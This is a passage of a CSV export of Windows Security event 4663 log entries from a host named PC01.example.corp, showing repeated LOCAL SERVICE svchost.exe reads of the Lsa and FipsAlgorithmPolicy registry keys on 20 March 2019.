\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL 